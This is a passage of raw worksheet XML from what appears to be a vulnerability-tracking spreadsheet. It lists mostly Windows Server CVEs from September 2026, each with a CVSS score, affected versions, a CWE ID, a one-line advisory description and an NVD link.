      <c r="L237" s="5" t="inlineStr"/>
      <c r="M237" s="5" t="inlineStr"/>
      <c r="N237" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O237" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P237" s="5" t="inlineStr"/>
      <c r="Q237" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R237" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S237" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69342</t>
        </is>
      </c>
    </row>
    <row r="238">
      <c r="A238" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B238" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C238" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69397</t>
        </is>
      </c>
      <c r="D238" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E238" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F238" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G238" s="5" t="inlineStr"/>
      <c r="H238" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I238" s="5" t="inlineStr"/>
      <c r="J238" s="5" t="inlineStr">
        <is>
          <t>openssh</t>
        </is>
      </c>
      <c r="K238" s="5" t="inlineStr"/>
      <c r="L238" s="5" t="inlineStr"/>
      <c r="M238" s="5" t="inlineStr"/>
      <c r="N238" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O238" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P238" s="5" t="inlineStr"/>
      <c r="Q238" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R238" s="5" t="inlineStr">
        <is>
          <t>Use after free in OpenSSH for Windows allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S238" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69397</t>
        </is>
      </c>
    </row>
    <row r="239">
      <c r="A239" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B239" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C239" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69514</t>
        </is>
      </c>
      <c r="D239" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E239" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F239" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G239" s="5" t="inlineStr"/>
      <c r="H239" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I239" s="5" t="inlineStr"/>
      <c r="J239" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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39" s="5" t="inlineStr"/>
      <c r="M239" s="5" t="inlineStr"/>
      <c r="N239" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O239" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P239" s="5" t="inlineStr"/>
      <c r="Q239" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R239" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Remote Desktop Services allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S239" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69514</t>
        </is>
      </c>
    </row>
    <row r="240">
      <c r="A240" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B240" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C240" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69539</t>
        </is>
      </c>
      <c r="D240" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E240" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F240" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G240" s="5" t="inlineStr"/>
      <c r="H240" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I240" s="5" t="inlineStr"/>
      <c r="J240" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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0" s="5" t="inlineStr"/>
      <c r="M240" s="5" t="inlineStr"/>
      <c r="N240" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O240" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P240" s="5" t="inlineStr"/>
      <c r="Q240" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R240" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Desktop Services allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S240" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69539</t>
        </is>
      </c>
    </row>
    <row r="241">
      <c r="A241" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B241" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C241" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69599</t>
        </is>
      </c>
      <c r="D241" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E241" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F241" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G241" s="5" t="inlineStr"/>
      <c r="H241" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I241" s="5" t="inlineStr"/>
      <c r="J241" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K241" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L241" s="5" t="inlineStr"/>
      <c r="M241" s="5" t="inlineStr"/>
      <c r="N241" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O241" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P241" s="5" t="inlineStr"/>
      <c r="Q241" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R241" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Desktop Services allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S241" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69599</t>
        </is>
      </c>
    </row>
    <row r="242">
      <c r="A242" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B242" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C242" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69803</t>
        </is>
      </c>
      <c r="D242" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E242" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F242" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G242" s="5" t="inlineStr"/>
      <c r="H242" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I242" s="5" t="inlineStr"/>
      <c r="J242" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K242" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L242" s="5" t="inlineStr"/>
      <c r="M242" s="5" t="inlineStr"/>
      <c r="N242" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O242" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P242" s="5" t="inlineStr"/>
      <c r="Q242" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R242" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S242" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69803</t>
        </is>
      </c>
    </row>
    <row r="243">
      <c r="A243" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B243" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C243" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69804</t>
        </is>
      </c>
      <c r="D243" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E243" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F243" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G243" s="5" t="inlineStr"/>
      <c r="H243" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I243" s="5" t="inlineStr"/>
      <c r="J243" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K243" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L243" s="5" t="inlineStr"/>
      <c r="M243" s="5" t="inlineStr"/>
      <c r="N243" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O243" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P243" s="5" t="inlineStr"/>
      <c r="Q243" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="R243" s="5" t="inlineStr">
        <is>
          <t>Time-of-ch</t>
        </is>
      </c>
      <c r="S243" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69804</t>
        </is>
      </c>
    </row>
    <row r="244">
      <c r="A244" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B244" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C244" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69852</t>
        </is>
      </c>
      <c r="D244" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E244" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F244" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G244" s="5" t="inlineStr"/>
      <c r="H244" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I244" s="5" t="inlineStr"/>
      <c r="J244" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K24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4" s="5" t="inlineStr"/>
      <c r="M244" s="5" t="inlineStr"/>
      <c r="N244" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O244" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P244" s="5" t="inlineStr"/>
      <c r="Q244" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R244" s="5" t="inlineStr">
        <is>
          <t>Remote Code Execution in Windows Routing and Remote Access Service (RRAS) allows attacker to gain an unauthorized access to victim's machine</t>
        </is>
      </c>
      <c r="S244" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69852</t>
        </is>
      </c>
    </row>
    <row r="245">
      <c r="A245" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B245" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C245" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69881</t>
        </is>
      </c>
      <c r="D245" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E245" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F245" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G245" s="5" t="inlineStr"/>
      <c r="H245" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I245" s="5" t="inlineStr"/>
      <c r="J245" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K245"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45" s="5" t="inlineStr"/>
      <c r="M245" s="5" t="inlineStr"/>
      <c r="N245" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O245" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P245" s="5" t="inlineStr"/>
      <c r="Q245" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="R245" s="5" t="inlineStr">
        <is>
          <t>Null pointer dereference in Windows IKE Extension allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S245" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69881</t>
        </is>
      </c>
    </row>
    <row r="246">
      <c r="A246" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B246" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C246" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69890</t>
        </is>
      </c>
      <c r="D246" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E246" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F246" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G246" s="5" t="inlineStr"/>
      <c r="H246" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I246" s="5" t="inlineStr"/>
      <c r="J246" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K24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46" s="5" t="inlineStr"/>
      <c r="M246" s="5" t="inlineStr"/>
      <c r="N246" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O246" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P246" s="5" t="inlineStr"/>
      <c r="Q246" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R246" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Virtual Trusted Platform Module allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S246" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69890</t>
        </is>
      </c>
    </row>
    <row r="247">
      <c r="A247" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B247" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C247" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69929</t>
        </is>
      </c>
      <c r="D247" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E247" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F247" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G247" s="5" t="inlineStr"/>
      <c r="H247" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I247" s="5" t="inlineStr"/>
      <c r="J247" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K247" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L247" s="5" t="inlineStr"/>
      <c r="M247" s="5" t="inlineStr"/>
      <c r="N247" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O247" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P247" s="5" t="inlineStr"/>
      <c r="Q247" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R247" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S247" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69929</t>
        </is>
      </c>
    </row>
    <row r="248">
      <c r="A248" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B248" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C248" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69930</t>
        </is>
      </c>
      <c r="D248" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E248" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F248" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G248" s="5" t="inlineStr"/>
      <c r="H248" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I248" s="5" t="inlineStr"/>
      <c r="J248" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K248" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L248" s="5" t="inlineStr"/>
      <c r="M248" s="5" t="inlineStr"/>
      <c r="N248" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O248" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P248" s="5" t="inlineStr"/>
      <c r="Q248" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R248" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S248" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69930</t>
        </is>
      </c>
    </row>
    <row r="249">
      <c r="A249" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B249" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C249" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70065</t>
        </is>
      </c>
      <c r="D249" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E249" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F249" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G249" s="5" t="inlineStr"/>
      <c r="H249" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I249" s="5" t="inlineStr"/>
      <c r="J249" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K249" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L249" s="5" t="inlineStr"/>
      <c r="M249" s="5" t="inlineStr"/>
      <c r="N249" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O249" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P249" s="5" t="inlineStr"/>
      <c r="Q249" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="R249" s="5" t="inlineStr">
        <is>
          <t>Missing release of memory after effective lifetime in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S249" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70065</t>
        </is>
      </c>
    </row>
    <row r="250">
      <c r="A250" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B250" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C250" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70124</t>
        </is>
      </c>
      <c r="D250" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E250" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F250" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G250" s="5" t="inlineStr"/>
      <c r="H250" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I250" s="5" t="inlineStr"/>
      <c r="J250" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K250" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L250" s="5" t="inlineStr"/>
      <c r="M250" s="5" t="inlineStr"/>
      <c r="N250" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O250" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P250" s="5" t="inlineStr"/>
      <c r="Q250" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R250" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S250" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70124</t>
        </is>
      </c>
    </row>
    <row r="251">
      <c r="A251" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B251" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C251" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70587</t>
        </is>
      </c>
      <c r="D251" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E251" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F251" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G251" s="5" t="inlineStr"/>
      <c r="H251" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I251" s="5" t="inlineStr"/>
      <c r="J251" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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1" s="5" t="inlineStr"/>
      <c r="M251" s="5" t="inlineStr"/>
      <c r="N251" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O251" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P251" s="5" t="inlineStr"/>
      <c r="Q251" s="5" t="inlineStr">
        <is>
          <t>CWE-170</t>
        </is>
      </c>
      <c r="R251" s="5" t="inlineStr">
        <is>
          <t>Improper null termination in Windows Remote Desktop Protocol allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S251" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70587</t>
        </is>
      </c>
    </row>
    <row r="252">
      <c r="A252" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B252" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C252" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71330</t>
        </is>
      </c>
      <c r="D252" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E252" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F252" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G252" s="5" t="inlineStr"/>
      <c r="H252" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I252" s="5" t="inlineStr"/>
      <c r="J252" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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52" s="5" t="inlineStr"/>
      <c r="M252" s="5" t="inlineStr"/>
      <c r="N252" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O252" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P252" s="5" t="inlineStr"/>
      <c r="Q252" s="5" t="inlineStr">
        <is>
          <t>CWE-497</t>
        </is>
      </c>
      <c r="R252" s="5" t="inlineStr">
        <is>
          <t>Exposure of sensitive system information to an unauthorized control sphere in Windows Services for NFS ONCRPC XDR Driver allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S252" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71330</t>
        </is>
      </c>
    </row>
    <row r="253">
      <c r="A253" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B253" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C253" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72928</t>
        </is>
      </c>
      <c r="D253" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E253" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F253" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G253" s="5" t="inlineStr"/>
      <c r="H253" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I253" s="5" t="inlineStr"/>
      <c r="J253" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K253" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L253" s="5" t="inlineStr"/>
      <c r="M253" s="5" t="inlineStr"/>
      <c r="N253" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O253" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P253" s="5" t="inlineStr"/>
      <c r="Q253" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R253" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S253" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72928</t>
        </is>
      </c>
    </row>
    <row r="254">
      <c r="A254" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B254" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C254" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73017</t>
        </is>
      </c>
      <c r="D254" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E254" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F254" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G254" s="5" t="inlineStr"/>
      <c r="H254" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I254" s="5" t="inlineStr"/>
      <c r="J254" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K254"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254" s="5" t="inlineStr"/>
      <c r="M254" s="5" t="inlineStr"/>
      <c r="N254" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O254" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P254" s="5" t="inlineStr"/>
      <c r="Q254" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R254" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Graphics Kernel allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="S254" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73017</t>
        </is>
      </c>
    </row>
    <row r="255">
      <c r="A255" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B255" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C255" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77494</t>
